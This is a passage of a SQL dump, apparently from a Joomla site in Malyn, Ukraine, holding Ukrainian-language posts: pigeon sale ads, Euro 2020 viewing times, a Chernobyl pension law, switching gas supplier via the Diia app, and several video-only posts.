position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,3,'','',1,140,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2522,2945,'Шоколадна парочка поміняє прописку','shokoladna-parochka-pominyae-propisku','<p><strong>Голуб 19 року та самочка 20 року, спаровані,&nbsp;</strong></p><!--StartFragment--><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;\"><strong>Локація - м.Малин, Житомирської області.</strong></p><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;\"><strong>Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч, Хмільник. Ціна 300 за одного, телефонуйте 0508320922, домовимось.</strong></p><p><img src=\"https://malehus.in.ua/images/stories/121212.jpg\" alt=\"\" class=\"fr-dii fr-fin\"><strong><br></strong></p><p><img src=\"https://malehus.in.ua/images/stories/IMG_20210616_181613.jpg\" alt=\"\" class=\"fr-fin\" width=\"549\"><br></p><!--EndFragment-->','',1,127,'2021-06-17 19:31:36',430,'','2021-06-17 19:31:36',0,0,'0000-00-00 00:00:00','2021-06-17 19:31:36','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,'','',1,97,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2523,2946,'Поштові молоді ','poshtovi-molodi','	<p><img alt=\"\" class=\"fr-fil fr-dii\" src=\"https://malehus.in.ua/images/stories/230621.jpg\"></p><p><br><!--EndFragment--></p><p><br></p><p>Голуби поштові молоді необлітані, локація - м.Малин  Житомрської області.</p><p>Можу маршруткою  передати в Київ, Житомир, Радомишль, Коростишів, Бердичів, Вінницю, Овруч.</p><p>Дзвоніть 0508320922 - домовимось.</p>','',1,126,'2021-06-23 08:18:23',430,'','2021-06-23 08:20:35',430,0,'0000-00-00 00:00:00','2021-06-23 08:18:23','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,2,'','',1,228,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2524,2947,'Україна – Англія: де дивитися матч чемпіонату Європи-2020','ukrajina-angliya-de-divitisya-match-chempionatu-evropi-2020','<p><strong>Поєдинок Україна – Англія відбудеться у Римі на Стадіо Олімпіко 3 липня.  Початок матчу о 22:00.</strong></p><p><span style=\"font-family: Verdana, Geneva; font-size: 15px;\">Матч у прямому ефірі на території України покажуть кілька трансляторів.  Дивитись матч Україна – Англія онлайн можна на платфо<img alt=\"\" class=\"fr-image-dropped fr-fil fr-dii\" src=\"https://malehus.in.ua/images/stories/2x11_gif.gif\">рмі Oll.tv за наявності відповідної підписки. Крім того, гру можна переглянути в  прямому ефірі на телеканалі \"Футбол 1\", починаючи з 21:50.</span></p><p><span style=\"font-family: Verdana, Geneva; font-size: 15px;\">ТРК \"Україна\" також покаже матч команди Шевченка в 1/4 чемпіонату  Європи. Початок трансляції – о 21:50. Поєдинок на ТРК \"Україна\" можна  переглянути онлайн на MEGOGO  (за наявності оплаченої підписки).</span></p><p><span style=\"font-family: Verdana, Geneva; font-size: 15px;\">Для довідки: збірні України та Англії зустрічалися раніше 7 разів. Перевага  на боці \"Трьох левів\": 4 перемоги, 2 нічиї, 1 поразка. Єдина перемога  \"синьо-жовтих\" (1:0) трапилася у кваліфікації до ЧС-2010. Переможний  м\'яч у Дніпрі тоді забив Сергій Назаренко.</span></p>','',1,8,'2021-07-02 11:23:21',430,'','2021-07-02 12:12:09',430,0,'0000-00-00 00:00:00','2021-07-02 11:23:21','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',52,14,'','',1,153,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2525,2948,'До відома пенсіонерів чорнобильців','do-vidoma-pensioneriv-chornobiltsiv','<p><img src=\"https://malehus.in.ua/images/stories/pensia.jpg\" alt=\"\" class=\"fr-fil fr-dii\" width=\"314\">В Україні частково набрав чинності закон, що передбачає підвищення пенсій для чорнобильців. Повністю він набере чинності з 1 січня 2022 року.</p><p>Документ вчора опублікували у виданні \"Голос України\".</p><p>Ряд його положень набрали чинності з 1 липня:</p><p>-положення про мінімальні розміри пенсії по інвалідності, що настала внаслідок каліцтва чи захворювання;</p><p>-пенсії у зв\'язку з втратою годувальника внаслідок Чорнобильської катастрофи;</p><p>-введення державної адресної допомоги до пенсії.</p><p>Із закону випливає, що додаткова пенсія за шкоду, заподіяну здоров\'ю, та щомісячна компенсація сім\'ям за втрату годувальника внаслідок Чорнобильської катастрофи, виплачується повністю і не залежить від зарплати, інших пенсій чи інших доходів.','</p><p>У документі прописано, що для нарахування певного розміру пенсії українцям, які пропрацювали на територіях радіоактивного забруднення, будуть виходити з різних формул:</p><p>-менш як 12 місяців - зарплата визначається за формулою: зарплата за ці місяці ділиться на число відпрацьованих місяців;</p><p>-не менше 30 календарних днів у двох місяцях - зарплата визначається за будь-які фактичні відпрацьовані 30 календарних днів роботи;</p><p>-менш як місяць - зарплата визначається за один календарний місяць з додаванням до заробітної плати на основній роботі.</p><p>Українцям, які брали безпосередню участь у ліквідації інших ядерних аварій та їх наслідків, у ядерних випробуваннях, у військових навчаннях із застосуванням ядерної зброї і внаслідок цього стали особами з інвалідністю, надали право на держпенсію у розмірі п\'ятикратного розміру від розміру мінімальної зарплати, встановленої на 1 січня відповідного року.Так, виплати для \"чорнобильців\", які отримали в результаті аварії на ЧАЕС інвалідність, складуть:</p><p>-для першої групи - 16 080 гривень,</p><p>-для другої групи - 12 987 гривень,</p><p>-для третьої групи - 8 917 гривень.</p>',1,8,'2021-07-02 12:21:09',430,'','2021-07-02 12:29:58',430,0,'0000-00-00 00:00:00','2021-07-02 12:21:09','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',8,13,'','',1,96,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2526,2949,'09 липня 2021 - куди далі?','09-lipnya-2021-kudi-dali','<p><img src=\"https://malehus.in.ua/images/stories/a95.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></p>','',1,8,'2021-07-09 13:26:34',430,'','2021-07-09 13:26:34',0,0,'0000-00-00 00:00:00','2021-07-09 13:26:34','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,12,'','',1,89,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2527,2950,'Ентоні Гопкінс не тільки актор світового рівня, але й автор шикарного вальсу','entoni-gopkins-ne-tilki-aktor-svitovogo-rivnya-ale-j-avtor-shikarnogo-valsu','	<p><img alt=\"\" class=\"fr-dii fr-fin\" src=\"https://malehus.in.ua/images/stories/entony.jpg\"></p><p><br><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/1LGVGekPSzo\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>','',1,8,'2021-07-09 19:30:46',430,'','2021-07-09 19:33:25',430,0,'0000-00-00 00:00:00','2021-07-09 19:30:46','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,11,'','',1,97,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2528,2951,'Змінити постачальника газу тепер можна через «Дію»','zminiti-postachalnika-gazu-teper-mozhna-cherez-diyu','<!--StartFragment--><p style=\"text-align: left;\"><img alt=\"\" class=\"fr-fil fr-dii\" src=\"https://malehus.in.ua/images/stories/dia.jpg\" width=\"251\"><br></p><p>Приєднатися до державного постачальника газу – ГК «Нафтогаз України» – тепер можна через застосунок «Дія». Таким чином, вибір оптимального тарифного пакету для купівлі газу і оформлення заявки на приєднання займе всього кілька хвилин.</p><p>Як швидко та зручно стати клієнтом Газопостачальної компанії «Нафтогаз України» через «Дію»? Покрокова інструкція.</p><p>1. Перейдіть на офіційний сайт ГК «Нафтогаз України»&nbsp;gas.ua&nbsp;у розділ «Стати нашим клієнтом»;<br>2. Оберіть варіант подачі заявки «Сайт» та натисніть «Подати заявку»;<br>3. Серед запропонованих способів заповнення заявки оберіть Дію;<br>Система запропонує вам обрати один із двох документів — ID-картку або РНОКПП (раніше — ІПН, індивідуальний податковий номер). Оберіть саме той документ, який додано та верифіковано у вашому застосунку Дія, та відскануйте запропонований QR-код (якщо ж ви заповнюєте заявку у мобільній версії сайту, просто натисніть на QR-код на екрані);<br>4. Далі на вашому смартфоні потрібно підтвердити передачу компанії ГК «Нафтогаз України» копій обраного цифрового документу, натиснувши кнопку «Надіслати через Дію». Після підтвердження на екрані з’явиться ваша заявка на приєднання до газопостачання від ГК «Нафтогаз України» із частково заповненими даними, які будуть підвантажені з додатку Дія;','<br>5. Доповніть деякі поля необхідною інформацією для зміни постачальника. Щоб завершити процес, натисніть «Сформувати файл заявки» та підпишіть її зручним для вас способом — електронним підписом (КЕП) або від руки.<br>Отже, подача заявки на сайті компанії gas.ua відбувається у кілька кліків, а її обробка триває 10-15 хвилин ― без урахування актуалізації даних на платформі Оператора ГТС, що триває в середньому три дні.</p><p><a href=\"https://gazpravda.com.ua/\">https://gazpravda.com.ua/</a></p><!--EndFragment-->',1,8,'2021-07-14 09:05:38',430,'','2021-07-14 13:43:18',430,0,'0000-00-00 00:00:00','2021-07-14 09:05:38','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,10,'','',1,107,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2529,2952,'Виконання дохідної частини бюджетів ОТГ Житомирської області за перше півріччя 2021 року','vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-pershe-pivrichchya-2021-roku','<p>За даними Департамента фінансів Житомирської ОДА<img src=\"https://malehus.in.ua/images/stories/censor.jpg\" alt=\"\" class=\"fr-fir\" width=\"207\"></p>','',1,8,'2021-07-15 12:09:14',430,'','2021-07-15 12:09:14',0,0,'0000-00-00 00:00:00','2021-07-15 12:09:14','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,9,'','',1,70,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2530,2953,'Вартість електроенергії з 1 жовтня 21 року','vartist-elektroenergiji-z-1-zhovtnya-21-roku','<p><img src=\"https://malehus.in.ua/images/stories/El.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></p>','',1,8,'2021-08-17 11:51:23',430,'','2021-08-17 11:51:23',0,0,'0000-00-00 00:00:00','2021-08-17 11:51:23','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,8,'','',1,95,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2531,2954,'Зарядка перед сніданком','zaryadka-pered-snidankom','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/RPoxCVoxFyo\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>','',1,126,'2021-08-22 08:55:58',430,'','2021-08-22 08:55:58',0,0,'0000-00-00 00:00:00','2021-08-22 08:55:58','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,1,'','',1,21,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2532,2955,'Сніданок поштових голубів','snidanok-poshtovikh-golubiv','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/gI8OSRz-VEg\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>','',1,126,'2021-08-22 08:57:40',430,'','2021-08-22 08:57:40',0,0,'0000-00-00 00:00:00','2021-08-22 08:57:40','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,'','',1,29,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2533,2956,'З Днем Незалежності України!','z-dnem-nezalezhnosti-ukrajini','<!--StartFragment--><p style=\"text-align: center;\"><strong><em><span style=\"color: rgb(41, 105, 176); font-family: Georgia; font-size: 20px;\">Незалежність завжди починається з кожного з нас, наших вчинків, наших думок, наших рішень.</span></em></strong></p><p><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/240821.jpg\" width=\"650\"><br></p><p><br></p><!--EndFragment--><p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/w_mtFAJjxVI\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>','',1,8,'2021-08-24 06:13:20',430,'','2021-08-24 06:15:10',430,0,'0000-00-00 00:00:00','2021-08-24 06:13:20','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,7,'','',1,142,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2534,2957,'Малину - 1130 років','malinu-1130-rokiv','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/4Rngvn7-ss4\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>','',1,8,'2021-09-12 05:33:18',430,'','2021-09-12 05:33:18',0,0,'0000-00-00 00:00:00','2021-09-12 05:33:18','0000-00-00 